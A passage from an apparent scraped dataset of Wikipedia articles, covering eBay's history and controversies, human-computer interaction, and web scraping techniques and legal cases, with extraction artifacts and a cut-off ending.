intelligence and machine learning technologies. 97 98 On January 31, 2018, eBay announced that it would replace PayPal as its primary payments provider with Netherlands-based start-up Adyen, resulting in lower costs and more control of merchants. 99 In May 2018, eBay acquired the Japanese e-commerce platform Qoo10 for $573 million. 100 101 In July 2018, eBay announced support for Apple Pay as well as a partnership with Square for seller financing loans of up to $100,000. 102 103 In September 2018, in response to the YouTube headquarters shooting, eBay announced plans to install a security fence around the perimeter of its San Jose headquarters to protect employees. 104 In March 2019, the company paid its first dividend following investor pressure to improve shareholder return. 105 On July 31, 2019, the company acquired a 5.59% stake in Paytm Mall. 106 107 In September 2019, facing pressure from activist shareholder Elliott Investment Management, Devin Wenig resigned as CEO. Scott Schenkel, senior vice president and chief financial officer since 2015, was appointed as the interim CEO. 108 109 In November 2019, eBay agreed to sell StubHub to Viagogo for $4.05 billion in cash; the sale was completed in February 2020. 110 111 112 In April 2020, Jamie Iannone became the CEO of the company. 113 In June 2020, Fred D. Anderson and Thomas J. Tierney resigned from the board of directors of the company; both had been directors since 2003. 114 In July 2020, eBay sold its classifieds business to Adevinta for $2.5 billion in cash and 540 million shares of Adevinta. To gain regulatory approval, Gumtree was further divested. eBay sold its shares in Adevinta in 2023, when that company was acquired by private equity firms. 115 116 117 In September 2020, Pierre Omidyar resigned from the board of directors, after resigning as chairman in 2015. 118 In November 2021, eBay sold its South Korean business to Emart for $3 billion. 119 120 In May 2022, eBay acquired a stake in Funko and became the preferred secondary marketplace for Funko. 121 In June 2022, the company acquired KnownOrigin, a marketplace for non-fungible tokens. 122 123 In August 2022, the company acquired the myFitment group of companies, specializing in online sales of automotive and powersports parts and accessories. 124 In October 2022, the company acquired TCGPlayer, a marketplace for collectible card games, for up to $295 million. 125 126 In July 2023, the company acquired Certiligo, a provider of artificial intelligence-powered digital IDs and authentication for apparel and fashion goods. 127 128 In January 2024, the company announced plans to lay off 9% of its workforce after hiring outpaced growth projections. 129 Using MissionFish as an arbiter, eBay allows sellers to donate a portion of their auction proceeds to a charity of the seller's choice and charges discounted fees for charity auctions. 146 High-profile charity auctions facilitated via eBay include the "Power Lunch" with investor Warren Buffett for 8 people at the Smith Wollensky restaurant in New York City, with all of the proceeds going to the Glide Foundation. Auctions were held annually in 21 years between 2000 and 2022, with no auctions in 2020 and 2021 due to the COVID 19 pandemic. In total, auctions on eBay for lunch with Buffett raised $53.2 million for the Glide Foundation, with winning bids ranging from $2 million to as high as $19 million for the final auction in 2022. 147 148 149 150 In May 2024, a charity auction for lunch with Marc Benioff, CEO of Salesforce, raised $200,000 plus an additional donation of $1.5 million for Glide Foundation. 151 Also benefitting charity, a letter sent to Mark P. Mays, CEO of Clear Channel Communications by Senator Harry Reid and forty other Democratic senators, complaining about comments made by conservative talk show host Rush Limbaugh, sold for $2,100,100, with all of the proceeds going to the Marine Corps-Law Enforcement Foundation, benefiting the education of children of men and women who have died serving in the armed forces. The winning bid was matched by Limbaugh. 152 In 2022, more than $163 million was raised for charities via the platform. 1 Fraud committed by sellers includes selling counterfeit merchandise bootleg recordings, shill bidding (undisclosed vendor bidding that is used to artificially inflate the price of a certain item by either the seller under an alternate account or another person in collusion with the seller), receiving payment and not shipping merchandise, shipping items other than those described, giving a deliberately misleading description and or photo, knowingly and deliberately shipping faulty merchandise, denying warranty exchange after pre-agreeing to return merchandise authorization of defective on arrival merchandise, knowingly fencing (selling stolen goods), misrepresenting the cost of shipping, using bulk shipping prices to knowingly mask much higher costing, individual return shipping, and using pseudo-accounts to make high nonpaying bids on similar items that competitors are selling. eBay has been criticized for not doing enough to combat shill bidding. There are techniques such as auction sniping, which let buyers avoid shill bidders. 153 154 Fraud committed by buyers includes filing a false shipping damage claim with the shipping company, friendly fraud (receiving merchandise and claiming otherwise), returning items other than received, removing parts from an item and returning it for a refund, sending a forged payment-service e-mail that states that he or she has made a payment to the seller's account as proof of payment, making a low bid then using pseudo-accounts to make high nonpaying bids in an attempt at gaining a low second chance offer price, damaging a non-refundable item to get a refund by claiming that the seller sent the item already damaged (in cases of buyer's remorse), and a package redirection scam, in which the return package is filled with garbage and sent to the wrong address. 155 156 In 2004, Tiffany Co. filed a lawsuit against eBay claiming that over 70% of the Tiffany silver jewelry offered for sale on eBay was fake and that eBay profited from the sales of counterfeit Tiffany items that infringed on its trademark. 157 On July 14, 2008, a Federal District Court judge ruled that eBay does not have a legal responsibility to monitor users selling counterfeit items. 158 In 2010, the Second Circuit affirmed this decision in Tiffany (NJ) Inc. v. eBay Inc. 159 In June 2008, a court in Paris awarded damages of 40 million to LVMH over eBay auctions of counterfeit bags, perfumes, and other items sold by non-authorized retailers and entered a permanent injunction against eBay auctions of LVMH perfumes, whether counterfeit or not. eBay banned such items from its site. 160 161 Also that month, a court in Troyes, France awarded eBay to pay luxury goods maker Herm s 20,000 due to the sale of two counterfeit bags on eBay in 2006. The court also ordered eBay to post the ruling on the home page of eBay's French website for three months. 162 eBay allows buyers to rate any seller with positive, neutral, and negative comments. However, the option for sellers to leave anything other than positive feedback to buyers was removed in 2008. 163 164 Criticism of the feedback system includes the fact that small and large transactions carry the same weight in the feedback summary. It is therefore possible for a dishonest user to initially build up a deceptive positive rating by buying or selling low value items, such as e-books, recipes, etc., then subsequently switch to fraud. 165 In 2007 and 2008, during the period of eBay's ownership of PayPal, eBay required sellers to accept and buyers to pay with PayPal in many instances. This resulted in scrutiny by several regulatory agencies worldwide. 166 167 168 169 The company later changed its payment requirements. 170 In 2008, eBay reached a deal with Buy.com to list millions of items for sale by the retailer, angering sellers who faced additional competition. 171 In January 2010, Auctionbytes.com held an open survey in which sellers could rate eBay, as well as competing auction and marketplace sites. In the survey, users were asked to rank 15 sites based on five criteria: profitability, customer service, communication, ease of use, and recommendation. eBay was ranked 13th, after other large sites such as Amazon.com and Craigslist, as well as lesser-known selling sites such as Atomic Mall, eCRATER, and Ruby Lane. In individual category rankings, eBay was rated the worst of all the 15 sites on customer service and communication, and average on ease of use. Some respondents stated they would have given eBay a rating of 10, three to five years ago. eBay was rated twelfth out of fifteen in the Recommended Selling Venue category. 172 173 In 2011, eBay agreed to pay $30 million to settle a class action lawsuit alleging that it overcharged seller fees for sales of auto parts and accessories between April 2005 and August 2009. Members of the class received a refund of 6.67% of the fees paid in this category. 174 eBay has been criticized for arranging its affairs so as to pay a low level of taxes in the United Kingdom. The Sunday Times reported in October 2012 that eBay paid only 1.2 million in tax on sales of over 800 million in 2010. eBay responded that it "complies fully with all applicable tax laws". 175 On May 21, 2014, the company revealed that the consumer database of usernames, passwords, phone numbers, and physical addresses was breached between late February and early March. Users were forced to change their passwords. The Syrian Electronic Army took responsibility for the attack and said that it would not misuse the data; however, in a move of website defacement, replaced the front pages of the websites with their own logo. 176 177 178 179 In June 2020, five employees were terminated and were subject to charges of cyberstalking after they were accused of targeting Ina and David Steiner, the editors and publishers of EcommerceBytes, a newsletter that eBay executives viewed as critical of the company. In addition to sending harassing messages and doxing, the defendants "ordered anonymous and disturbing deliveries to the victims’ home, including a preserved fetal pig, a bloody pig Halloween mask, a funeral wreath, a book on surviving the loss of a spouse, and pornography". The defendants also vandalized the couple's home in Natick, Massachusetts. 180 181 182 183 184 The conspirators pleaded guilty and most were sentenced to prison terms. 185 Wenig, the company's CEO at the time of the harassment campaign, who was frequently targeted by the newsletter and was described as having paranoia over the criticism, was not charged, instead leaving the company in September 2019 with a $57 million severance package. 186 187 188 189 Steve Wymer, chief communication officer, who had ties with local politicians, was fired "for cause" for alleged involvement but was not charged and was hired by the local chapter of the Boys Girls Clubs of America. 190 191 192 193 Items prohibited to be sold on the website include illegal items such as child pornography, counterfeit products; or items that require licenses to sell such as tobacco, alcoholic beverages, firearms and ammunition, certain knives, 194 human body parts, 195 196 drugs, tarot readings and spells, 197 198 virtual in-game items; 199 as well as offensive items such as Nazi memorabilia, flags of the Confederate States of America, and used sex toys. Regulations vary by jurisdiction. In late 1999, a man offered one of his kidneys for auction on eBay, attempting to profit from the potentially lucrative (and, in the United States, illegal) market for organ transplants. 200 Two previously undiscovered species, including the Coelopleurus exquisitus sea urchin in 2006, have been listed for sale on eBay. 201 In January 2010, eBay withdrew a listing of a Dad's Army board game since the box graphics contained images of swastikas, claiming that it was Nazi paraphernalia and, as such, breached the terms of service. eBay was accused of pandering to political correctness. 202 Items stolen from the British Museum in 2013 were auctioned on eBay in 2016. The museum reported that several items of jewelry made of gold, semi-precious stones, and glass, dating from between 1,500 BC and the 19th century AD, were among those missing. One piece of ancient Roman jewelry made from onyx valued between 25,000 and 50,000, or US$32,000 and US$63,000 was listed on eBay with a minimum price of 40 (US$50) in 2016. There were no bids made for the treasure. The police are investigating this case. 203 The company said that it is supports local police in investigations and removes listings containing stolen property. 204 In 2021, the estate of Dr. Seuss requested from eBay, and the company complied, to ban the sale of six Dr. Seuss books due to concerns that some images contained therein were racially insensitive. This led to backlash from followers of right-wing politics and ignited a surge of interest in the discontinued books. 205 206 207 In September 2023, the United States Department of Justice sued eBay, accusing it of violating the Clean Air Act and other environmental laws by allowing the sale of several illegal products, including devices that defeat automobile pollution controls, restricted-use pesticides, and paint and coating removal products containing methylene chloride. 208 Formerly owned companies: 37 17 43 N 121 55 34 W 37.29528 N 121.92611 W 37.29528; 121.92611 |
607 | https://en.wikipedia.org/wiki/Web_scraping | https://ar.wikipedia.org/wiki/%D8%AA%D8%AC%D8%B1%D9%8A%D9%81_%D9%88%D9%8A%D8%A8 | 1 ( : Web scraping) (HTTP) . . HTML . . . . . |
608 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Human-computer_interaction | Human computer interaction (HCI) is research in the design and the use of computer technology, which focuses on the interfaces between people (users) and computers. HCI researchers observe the ways humans interact with computers and design technologies that allow humans to interact with computers in novel ways. A device that allows interaction between human being and a computer is known as a "Human-computer Interface (HCI) . As a field of research, human computer interaction is situated at the intersection of computer science, behavioral sciences, design, media studies, and several other fields of study. The term was popularized by Stuart K. Card, Allen Newell, and Thomas P. Moran in their 1983 book, The Psychology of Human Computer Interaction. The first known use was in 1975 by Carlisle. 1 The term is intended to convey that, unlike other tools with specific and limited uses, computers have many uses which often involve an open-ended dialogue between the user and the computer. The notion of dialogue likens human computer interaction to human-to-human interaction: an analogy that is crucial to theoretical considerations in the field. 2 3 Humans interact with computers in many ways, and the interface between the two is crucial to facilitating this interaction. HCI is also sometimes termed human machine interaction (HMI), man-machine interaction (MMI) or computer-human interaction (CHI). Desktop applications, internet browsers, handheld computers, and computer kiosks make use of the prevalent graphical user interfaces (GUI) of today. 4 Voice user interfaces (VUI) are used for speech recognition and synthesizing systems, and the emerging multi-modal and Graphical user interfaces (GUI) allow humans to engage with embodied character agents in a way that cannot be achieved with other interface paradigms. The growth in human computer interaction field has led to an increase in the quality of interaction, and resulted in many new areas of research beyond. Instead of designing regular interfaces, the different research branches focus on the concepts of multimodality citation needed over unimodality, intelligent adaptive interfaces over command action based ones, and active interfaces over passive interfaces. 5 The Association for Computing Machinery (ACM) defines human computer interaction as "a discipline that is concerned with the design, evaluation, and implementation of interactive computing systems for human use and with the study of major phenomena surrounding them". 4 A key aspect of HCI is user satisfaction, also referred to as End-User Computing Satisfaction. It goes on to say: "Because human computer interaction studies a human and a machine in communication, it draws from supporting knowledge on both the machine and the human side. On the machine side, techniques in computer graphics, operating systems, programming languages, and development environments are relevant. On the human side, communication theory, graphic and industrial design disciplines, linguistics, social sciences, cognitive psychology, social psychology, and human factors such as computer user satisfaction are relevant. And, of course, engineering and design methods are relevant. 4 Due to the multidisciplinary nature of HCI, people with different backgrounds contribute to its success. Poorly designed human-machine interfaces can lead to many unexpected problems. A classic example is the Three Mile Island accident, a nuclear meltdown accident, where investigations concluded that the design of the human-machine interface was at least partly responsible for the disaster. 6 7 8 Similarly, accidents in aviation have resulted from manufacturers' decisions to use non-standard flight instruments or throttle quadrant layouts: even though the new designs were proposed to be superior in basic human-machine interaction, pilots had already ingrained the "standard" layout. Thus, the conceptually good idea had unintended results. The human computer interface can be described as the point of communication between the human user and the computer. The flow of information between the human and computer is defined as the loop of interaction. The loop of interaction has several aspects to it, including: Human computer interaction studies the ways in which humans make—or do not make—use of computational artifacts, systems, and infrastructures. Much of the research in this field seeks to improve the human computer interaction by improving the usability of computer interfaces. 9 How usability is to be precisely understood, how it relates to other social and cultural values, and when it is, and when it may not be a desirable property of computer interfaces is increasingly debated. 10 11 Much of the research in the field of human computer interaction takes an interest in: Visions of what researchers in the field seek to achieve might vary. When pursuing a cognitivist perspective, researchers of HCI may seek to align computer interfaces with the mental model that humans have of their activities. When pursuing a post-cognitivist perspective, researchers of HCI may seek to align computer interfaces with existing social practices or existing sociocultural values. Researchers in HCI are interested in developing design methodologies, experimenting with devices, prototyping software, and hardware systems, exploring interaction paradigms, and developing models and theories of interaction. The following experimental design principles are considered, when evaluating a current user interface, or designing a new user interface: The iterative design process is repeated until a sensible, user-friendly interface is created. 14 Various strategies delineating methods for human PC interaction design have developed since the conception of the field during the 1980s. Most plan philosophies come from a model for how clients, originators, and specialized frameworks interface. Early techniques treated clients' psychological procedures as unsurprising and quantifiable and urged plan specialists to look at subjective science to establish zones, (for example, memory and consideration) when structuring UIs. Present-day models, in general, center around a steady input and discussion between clients, creators, and specialists and push for specialized frameworks to be folded with the sorts of encounters clients need to have, as opposed to wrapping user experience around a finished framework. Displays are human-made artifacts designed to support the perception of relevant system variables and facilitate further processing of that information. Before a display is designed, the task that the display is intended to support must be defined (e.g., navigating, controlling, decision making, learning, entertaining, etc.). A user or operator must be able to process whatever information a system generates and displays; therefore, the information must be displayed according to principles to support perception, situation awareness, and understanding. Christopher Wickens et al. defined 13 principles of display design in their book An Introduction to Human Factors Engineering. 18 These human perception and information processing principles can be utilized to create an effective display design. A reduction in errors, a reduction in required training time, an increase in efficiency, and an increase in user satisfaction are a few of the many potential benefits that can be achieved by utilizing these principles. Certain principles may not apply to different displays or situations. Some principles may also appear to be conflicting, and there is no simple solution to say that one principle is more important than another. The principles may be tailored to a specific design or situation. Striking a functional balance among the principles is critical for an effective design. 19 1. Make displays legible (or audible). A display's legibility is critical and necessary for designing a usable display. If the characters or objects being displayed cannot be discernible, the operator cannot effectively use them. 2. Avoid absolute judgment limits. Do not ask the user to determine the level of a variable based on a single sensory variable (e.g., color, size, loudness). These sensory variables can contain many possible levels. 3. Top-down processing. Signals are likely perceived and interpreted by what is expected based on a user's experience. If a signal is presented contrary to the user's expectation, more physical evidence of that signal may need to be presented to assure that it is understood correctly. 4. Redundancy gain. If a signal is presented more than once, it is more likely to be understood correctly. This can be done by presenting the signal in alternative physical forms (e.g., color and shape, voice and print, etc.), as redundancy does not imply repetition. A traffic light is a good example of redundancy, as color and position are redundant. 5. Similarity causes confusion: Use distinguishable elements. Signals that appear to be similar will likely be confused. The ratio of similar features to different features causes signals to be similar. For example, A423B9 is more similar to A423B8 than 92 is to 93. Unnecessarily similar features should be removed, and dissimilar features should be highlighted. 6. Principle of pictorial realism. A display should look like the variable that it represents (e.g., the high temperature on a thermometer shown as a higher vertical level). If there are multiple elements, they can be configured in a manner that looks like they would in the represented environment. 7. Principle of the moving part. Moving elements should move in a pattern and direction compatible with the user's mental model of how it actually moves in the system. For example, the moving element on an altimeter should move upward with increasing altitude. 8. Minimizing information access cost or interaction cost. When the user's attention is diverted from one location to another to access necessary information, there is an associated cost in time or effort. A display design should minimize this cost by allowing frequently accessed sources to be located at the nearest possible position. However, adequate legibility should not be sacrificed to reduce this cost. 9. Proximity compatibility principle. Divided attention between two information sources may be necessary for the completion of one task. These sources must be mentally integrated and are defined to have close mental proximity. Information access costs should be low, which can be achieved in many ways (e.g., proximity, linkage by common colors, patterns, shapes, etc.). However, close display proximity can be harmful by causing too much clutter. 10. Principle of multiple resources. A user can more easily process information across different resources. For example, visual and auditory information can be presented simultaneously rather than presenting all visual or all auditory information. 11. Replace memory with visual information: knowledge in the world. A user should not need to retain important information solely in working memory or retrieve it from long-term memory. A menu, checklist, or another display can aid the user by easing the use of their memory. However, memory use may sometimes benefit the user by eliminating the need to reference some knowledge globally (e.g., an expert computer operator would rather use direct commands from memory than refer to a manual). The use of knowledge in a user's head and knowledge in the world must be balanced for an effective design. 12. Principle of predictive aiding. Proactive actions are usually more effective than reactive actions. A display should eliminate resource-demanding cognitive tasks and replace them with simpler perceptual tasks to reduce the user's mental resources. This will allow the user to focus on current conditions and to consider possible future conditions. An example of a predictive aid is a road sign displaying the distance to a certain destination. 13. Principle of consistency. Old habits from other displays will easily transfer to support the processing of new displays if they are designed consistently. A user's long-term memory will trigger actions that are expected to be appropriate. A design must accept this fact and utilize consistency among different displays. Topics in human computer interaction include the following: Social computing is an interactive and collaborative behavior considered between technology and people. In recent years, there has been an explosion of social science research focusing on interactions as the unit of analysis, as there are a lot of social computing technologies that include blogs, emails, social networking, quick messaging, and various others. Much of this research draws from psychology, social psychology, and sociology. For example, one study found out that people expected a computer with a man's name to cost more than a machine with a woman's name. 20 Other research finds that individuals perceive their interactions with computers more negatively than humans, despite behaving the same way towards these machines. 21 In human and computer interactions, a semantic gap usually exists between human and computer's understandings towards mutual behaviors. Ontology, as a formal representation of domain-specific knowledge, can be used to address this problem by solving the semantic ambiguities between the two parties. 22 In the interaction of humans and computers, research has studied how computers can detect, process, and react to human emotions to develop emotionally intelligent information systems. Researchers have suggested several 'affect-detection channels'. The potential of telling human emotions in an automated and digital fashion lies in improvements to the effectiveness of human computer interaction. The influence of emotions in human computer interaction has been studied in fields such as financial decision-making using ECG and organizational knowledge sharing using eye-tracking and face readers as affect-detection channels. In these fields, it has been shown that affect-detection channels have the potential to detect human emotions and those information systems can incorporate the data obtained from affect-detection channels to improve decision models. A brain computer interface (BCI), is a direct communication pathway between an enhanced or wired brain and an external device. BCI differs from neuromodulation in that it allows for bidirectional information flow. BCIs are often directed at researching, mapping, assisting, augmenting, or repairing human cognitive or sensory-motor functions. 23 Security interactions are the study of interaction between humans and computers specifically as it pertains to information security. Its aim, in plain terms, is to improve the usability of security features in end user applications. Unlike HCI, which has roots in the early days of Xerox PARC during the 1970s, HCISec is a nascent field of study by comparison. Interest in this topic tracks with that of Internet security, which has become an area of broad public concern only in very recent years. When security features exhibit poor usability, the following are common reasons: Traditionally, computer use was modeled as a human computer dyad in which the two were connected by a narrow explicit communication channel, such as text-based terminals. Much work has been done to make the interaction between a computing system and a human more reflective of the multidimensional nature of everyday communication. Because of potential issues, human computer interaction shifted focus beyond the interface to respond to observations as articulated by D. Engelbart: "If ease of use were the only valid criterion, people would stick to tricycles and never try bicycles. 24 How humans interact with computers continues to evolve rapidly. Human computer interaction is affected by developments in computing. These forces include: As of 2010 update the future for HCI is expected 25 to include the following characteristics: One of the main conferences for new research in human computer interaction is the annually held Association for Computing Machinery's (ACM) Conference on Human Factors in Computing Systems, usually referred to by its short name CHI (pronounced kai, or Khai). CHI is organized by ACM Special Interest Group on Computer-Human Interaction (SIGCHI). CHI is a large conference, with thousands of attendants, and is quite broad in scope. It is attended by academics, practitioners, and industry people, with company sponsors such as Google, Microsoft, and PayPal. There are also dozens of other smaller, regional, or specialized HCI-related conferences held around the world each year, including: 26 |
609 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-15 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority 